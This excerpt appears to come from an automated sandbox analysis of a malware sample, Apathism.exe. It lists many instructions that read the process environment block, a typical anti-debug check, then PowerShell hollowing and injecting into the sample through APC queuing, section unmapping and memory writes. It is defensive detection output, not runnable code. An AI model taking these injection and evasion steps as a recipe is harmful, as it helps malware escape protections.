      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236656A mov eax, dword ptr fs:[00000030h]7_2_2236656A
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22338550 mov eax, dword ptr fs:[00000030h]7_2_22338550
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22338550 mov eax, dword ptr fs:[00000030h]7_2_22338550
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223545B1 mov eax, dword ptr fs:[00000030h]7_2_223545B1
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223545B1 mov eax, dword ptr fs:[00000030h]7_2_223545B1
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B05A7 mov eax, dword ptr fs:[00000030h]7_2_223B05A7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B05A7 mov eax, dword ptr fs:[00000030h]7_2_223B05A7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B05A7 mov eax, dword ptr fs:[00000030h]7_2_223B05A7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E59C mov eax, dword ptr fs:[00000030h]7_2_2236E59C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22332582 mov eax, dword ptr fs:[00000030h]7_2_22332582
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22332582 mov ecx, dword ptr fs:[00000030h]7_2_22332582
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22364588 mov eax, dword ptr fs:[00000030h]7_2_22364588
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E5E7 mov eax, dword ptr fs:[00000030h]7_2_2235E5E7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E5E7 mov eax, dword ptr fs:[00000030h]7_2_2235E5E7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E5E7 mov eax, dword ptr fs:[00000030h]7_2_2235E5E7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E5E7 mov eax, dword ptr fs:[00000030h]7_2_2235E5E7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E5E7 mov eax, dword ptr fs:[00000030h]7_2_2235E5E7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E5E7 mov eax, dword ptr fs:[00000030h]7_2_2235E5E7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E5E7 mov eax, dword ptr fs:[00000030h]7_2_2235E5E7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E5E7 mov eax, dword ptr fs:[00000030h]7_2_2235E5E7
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223325E0 mov eax, dword ptr fs:[00000030h]7_2_223325E0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236C5ED mov eax, dword ptr fs:[00000030h]7_2_2236C5ED
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236C5ED mov eax, dword ptr fs:[00000030h]7_2_2236C5ED
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223365D0 mov eax, dword ptr fs:[00000030h]7_2_223365D0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236A5D0 mov eax, dword ptr fs:[00000030h]7_2_2236A5D0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236A5D0 mov eax, dword ptr fs:[00000030h]7_2_2236A5D0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E5CF mov eax, dword ptr fs:[00000030h]7_2_2236E5CF
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236E5CF mov eax, dword ptr fs:[00000030h]7_2_2236E5CF
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22354A35 mov eax, dword ptr fs:[00000030h]7_2_22354A35
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22354A35 mov eax, dword ptr fs:[00000030h]7_2_22354A35
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236CA38 mov eax, dword ptr fs:[00000030h]7_2_2236CA38
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236CA24 mov eax, dword ptr fs:[00000030h]7_2_2236CA24
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235EA2E mov eax, dword ptr fs:[00000030h]7_2_2235EA2E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BCA11 mov eax, dword ptr fs:[00000030h]7_2_223BCA11
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223ACA72 mov eax, dword ptr fs:[00000030h]7_2_223ACA72
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223ACA72 mov eax, dword ptr fs:[00000030h]7_2_223ACA72
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236CA6F mov eax, dword ptr fs:[00000030h]7_2_2236CA6F
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236CA6F mov eax, dword ptr fs:[00000030h]7_2_2236CA6F
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236CA6F mov eax, dword ptr fs:[00000030h]7_2_2236CA6F
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DEA60 mov eax, dword ptr fs:[00000030h]7_2_223DEA60
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22336A50 mov eax, dword ptr fs:[00000030h]7_2_22336A50
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22336A50 mov eax, dword ptr fs:[00000030h]7_2_22336A50
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22336A50 mov eax, dword ptr fs:[00000030h]7_2_22336A50
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22336A50 mov eax, dword ptr fs:[00000030h]7_2_22336A50
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22336A50 mov eax, dword ptr fs:[00000030h]7_2_22336A50
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22336A50 mov eax, dword ptr fs:[00000030h]7_2_22336A50
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22336A50 mov eax, dword ptr fs:[00000030h]7_2_22336A50
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340A5B mov eax, dword ptr fs:[00000030h]7_2_22340A5B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340A5B mov eax, dword ptr fs:[00000030h]7_2_22340A5B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22338AA0 mov eax, dword ptr fs:[00000030h]7_2_22338AA0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22338AA0 mov eax, dword ptr fs:[00000030h]7_2_22338AA0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22386AA4 mov eax, dword ptr fs:[00000030h]7_2_22386AA4
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22368A90 mov edx, dword ptr fs:[00000030h]7_2_22368A90
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA80 mov eax, dword ptr fs:[00000030h]7_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA80 mov eax, dword ptr fs:[00000030h]7_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA80 mov eax, dword ptr fs:[00000030h]7_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA80 mov eax, dword ptr fs:[00000030h]7_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA80 mov eax, dword ptr fs:[00000030h]7_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA80 mov eax, dword ptr fs:[00000030h]7_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA80 mov eax, dword ptr fs:[00000030h]7_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA80 mov eax, dword ptr fs:[00000030h]7_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233EA80 mov eax, dword ptr fs:[00000030h]7_2_2233EA80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22404A80 mov eax, dword ptr fs:[00000030h]7_2_22404A80
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236AAEE mov eax, dword ptr fs:[00000030h]7_2_2236AAEE
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236AAEE mov eax, dword ptr fs:[00000030h]7_2_2236AAEE
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22330AD0 mov eax, dword ptr fs:[00000030h]7_2_22330AD0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22364AD0 mov eax, dword ptr fs:[00000030h]7_2_22364AD0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22364AD0 mov eax, dword ptr fs:[00000030h]7_2_22364AD0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22386ACC mov eax, dword ptr fs:[00000030h]7_2_22386ACC
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22386ACC mov eax, dword ptr fs:[00000030h]7_2_22386ACC
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22386ACC mov eax, dword ptr fs:[00000030h]7_2_22386ACC
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235EB20 mov eax, dword ptr fs:[00000030h]7_2_2235EB20
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235EB20 mov eax, dword ptr fs:[00000030h]7_2_2235EB20
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F8B28 mov eax, dword ptr fs:[00000030h]7_2_223F8B28
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223F8B28 mov eax, dword ptr fs:[00000030h]7_2_223F8B28
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AEB1D mov eax, dword ptr fs:[00000030h]7_2_223AEB1D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AEB1D mov eax, dword ptr fs:[00000030h]7_2_223AEB1D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AEB1D mov eax, dword ptr fs:[00000030h]7_2_223AEB1D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AEB1D mov eax, dword ptr fs:[00000030h]7_2_223AEB1D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AEB1D mov eax, dword ptr fs:[00000030h]7_2_223AEB1D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AEB1D mov eax, dword ptr fs:[00000030h]7_2_223AEB1D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AEB1D mov eax, dword ptr fs:[00000030h]7_2_223AEB1D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AEB1D mov eax, dword ptr fs:[00000030h]7_2_223AEB1D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AEB1D mov eax, dword ptr fs:[00000030h]7_2_223AEB1D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2232CB7E mov eax, dword ptr fs:[00000030h]7_2_2232CB7E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DEB50 mov eax, dword ptr fs:[00000030h]7_2_223DEB50
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E4B4B mov eax, dword ptr fs:[00000030h]7_2_223E4B4B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E4B4B mov eax, dword ptr fs:[00000030h]7_2_223E4B4B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C6B40 mov eax, dword ptr fs:[00000030h]7_2_223C6B40
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C6B40 mov eax, dword ptr fs:[00000030h]7_2_223C6B40
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223FAB40 mov eax, dword ptr fs:[00000030h]7_2_223FAB40
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D8B42 mov eax, dword ptr fs:[00000030h]7_2_223D8B42
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340BBE mov eax, dword ptr fs:[00000030h]7_2_22340BBE
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22340BBE mov eax, dword ptr fs:[00000030h]7_2_22340BBE
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E4BB0 mov eax, dword ptr fs:[00000030h]7_2_223E4BB0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223E4BB0 mov eax, dword ptr fs:[00000030h]7_2_223E4BB0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22338BF0 mov eax, dword ptr fs:[00000030h]7_2_22338BF0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22338BF0 mov eax, dword ptr fs:[00000030h]7_2_22338BF0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22338BF0 mov eax, dword ptr fs:[00000030h]7_2_22338BF0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235EBFC mov eax, dword ptr fs:[00000030h]7_2_2235EBFC
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BCBF0 mov eax, dword ptr fs:[00000030h]7_2_223BCBF0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223DEBD0 mov eax, dword ptr fs:[00000030h]7_2_223DEBD0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22350BCB mov eax, dword ptr fs:[00000030h]7_2_22350BCB
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22350BCB mov eax, dword ptr fs:[00000030h]7_2_22350BCB
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22350BCB mov eax, dword ptr fs:[00000030h]7_2_22350BCB
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22330BCD mov eax, dword ptr fs:[00000030h]7_2_22330BCD
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22330BCD mov eax, dword ptr fs:[00000030h]7_2_22330BCD
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22330BCD mov eax, dword ptr fs:[00000030h]7_2_22330BCD
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22352835 mov eax, dword ptr fs:[00000030h]7_2_22352835
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22352835 mov eax, dword ptr fs:[00000030h]7_2_22352835
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22352835 mov eax, dword ptr fs:[00000030h]7_2_22352835
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22352835 mov ecx, dword ptr fs:[00000030h]7_2_22352835
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22352835 mov eax, dword ptr fs:[00000030h]7_2_22352835
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22352835 mov eax, dword ptr fs:[00000030h]7_2_22352835
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236A830 mov eax, dword ptr fs:[00000030h]7_2_2236A830
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D483A mov eax, dword ptr fs:[00000030h]7_2_223D483A
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D483A mov eax, dword ptr fs:[00000030h]7_2_223D483A
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BC810 mov eax, dword ptr fs:[00000030h]7_2_223BC810
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BE872 mov eax, dword ptr fs:[00000030h]7_2_223BE872
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BE872 mov eax, dword ptr fs:[00000030h]7_2_223BE872
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C6870 mov eax, dword ptr fs:[00000030h]7_2_223C6870
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C6870 mov eax, dword ptr fs:[00000030h]7_2_223C6870
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22360854 mov eax, dword ptr fs:[00000030h]7_2_22360854
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22334859 mov eax, dword ptr fs:[00000030h]7_2_22334859
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22334859 mov eax, dword ptr fs:[00000030h]7_2_22334859
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22342840 mov ecx, dword ptr fs:[00000030h]7_2_22342840
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BC89D mov eax, dword ptr fs:[00000030h]7_2_223BC89D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22330887 mov eax, dword ptr fs:[00000030h]7_2_22330887
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236C8F9 mov eax, dword ptr fs:[00000030h]7_2_2236C8F9
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2236C8F9 mov eax, dword ptr fs:[00000030h]7_2_2236C8F9
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223FA8E4 mov eax, dword ptr fs:[00000030h]7_2_223FA8E4
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235E8C0 mov eax, dword ptr fs:[00000030h]7_2_2235E8C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B892A mov eax, dword ptr fs:[00000030h]7_2_223B892A
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C892B mov eax, dword ptr fs:[00000030h]7_2_223C892B
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BC912 mov eax, dword ptr fs:[00000030h]7_2_223BC912
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22328918 mov eax, dword ptr fs:[00000030h]7_2_22328918
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22328918 mov eax, dword ptr fs:[00000030h]7_2_22328918
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AE908 mov eax, dword ptr fs:[00000030h]7_2_223AE908
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223AE908 mov eax, dword ptr fs:[00000030h]7_2_223AE908
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D4978 mov eax, dword ptr fs:[00000030h]7_2_223D4978
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223D4978 mov eax, dword ptr fs:[00000030h]7_2_223D4978
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BC97C mov eax, dword ptr fs:[00000030h]7_2_223BC97C
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22356962 mov eax, dword ptr fs:[00000030h]7_2_22356962
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22356962 mov eax, dword ptr fs:[00000030h]7_2_22356962
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22356962 mov eax, dword ptr fs:[00000030h]7_2_22356962
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2237096E mov eax, dword ptr fs:[00000030h]7_2_2237096E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2237096E mov edx, dword ptr fs:[00000030h]7_2_2237096E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2237096E mov eax, dword ptr fs:[00000030h]7_2_2237096E
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B0946 mov eax, dword ptr fs:[00000030h]7_2_223B0946
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B89B3 mov esi, dword ptr fs:[00000030h]7_2_223B89B3
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B89B3 mov eax, dword ptr fs:[00000030h]7_2_223B89B3
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223B89B3 mov eax, dword ptr fs:[00000030h]7_2_223B89B3
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223429A0 mov eax, dword ptr fs:[00000030h]7_2_223429A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223429A0 mov eax, dword ptr fs:[00000030h]7_2_223429A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223429A0 mov eax, dword ptr fs:[00000030h]7_2_223429A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223429A0 mov eax, dword ptr fs:[00000030h]7_2_223429A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223429A0 mov eax, dword ptr fs:[00000030h]7_2_223429A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223429A0 mov eax, dword ptr fs:[00000030h]7_2_223429A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223429A0 mov eax, dword ptr fs:[00000030h]7_2_223429A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223429A0 mov eax, dword ptr fs:[00000030h]7_2_223429A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223429A0 mov eax, dword ptr fs:[00000030h]7_2_223429A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223429A0 mov eax, dword ptr fs:[00000030h]7_2_223429A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223429A0 mov eax, dword ptr fs:[00000030h]7_2_223429A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223429A0 mov eax, dword ptr fs:[00000030h]7_2_223429A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223429A0 mov eax, dword ptr fs:[00000030h]7_2_223429A0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223309AD mov eax, dword ptr fs:[00000030h]7_2_223309AD
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223309AD mov eax, dword ptr fs:[00000030h]7_2_223309AD
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223629F9 mov eax, dword ptr fs:[00000030h]7_2_223629F9
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223629F9 mov eax, dword ptr fs:[00000030h]7_2_223629F9
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223BE9E0 mov eax, dword ptr fs:[00000030h]7_2_223BE9E0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233A9D0 mov eax, dword ptr fs:[00000030h]7_2_2233A9D0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233A9D0 mov eax, dword ptr fs:[00000030h]7_2_2233A9D0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233A9D0 mov eax, dword ptr fs:[00000030h]7_2_2233A9D0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233A9D0 mov eax, dword ptr fs:[00000030h]7_2_2233A9D0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233A9D0 mov eax, dword ptr fs:[00000030h]7_2_2233A9D0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2233A9D0 mov eax, dword ptr fs:[00000030h]7_2_2233A9D0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223649D0 mov eax, dword ptr fs:[00000030h]7_2_223649D0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223FA9D3 mov eax, dword ptr fs:[00000030h]7_2_223FA9D3
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C69C0 mov eax, dword ptr fs:[00000030h]7_2_223C69C0
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22402E4F mov eax, dword ptr fs:[00000030h]7_2_22402E4F
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22402E4F mov eax, dword ptr fs:[00000030h]7_2_22402E4F
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C6E20 mov eax, dword ptr fs:[00000030h]7_2_223C6E20
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C6E20 mov eax, dword ptr fs:[00000030h]7_2_223C6E20
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_223C6E20 mov ecx, dword ptr fs:[00000030h]7_2_223C6E20
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_22328E1D mov eax, dword ptr fs:[00000030h]7_2_22328E1D
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235AE00 mov eax, dword ptr fs:[00000030h]7_2_2235AE00
      Source: C:\Users\user\AppData\Local\Temp\Apathism.exeCode function: 7_2_2235AE00 mov eax, dword ptr fs:[00000030h]7_2_2235AE00
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

      HIPS / PFW / Operating System Protection Evasion

      barindex
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created / APC Queued / Resumed: C:\Users\user\AppData\Local\Temp\Apathism.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread APC queued: target process: C:\Users\user\AppData\Local\Temp\Apathism.exeJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection unmapped: C:\Users\user\AppData\Local\Temp\Apathism.exe base address: 400000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Users\user\AppData\Local\Temp\Apathism.exe base: 1660000Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\user\AppData\Local\Temp\Apathism.exe "C:\Users\user\AppData\Local\Temp\Apathism.exe"Jump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
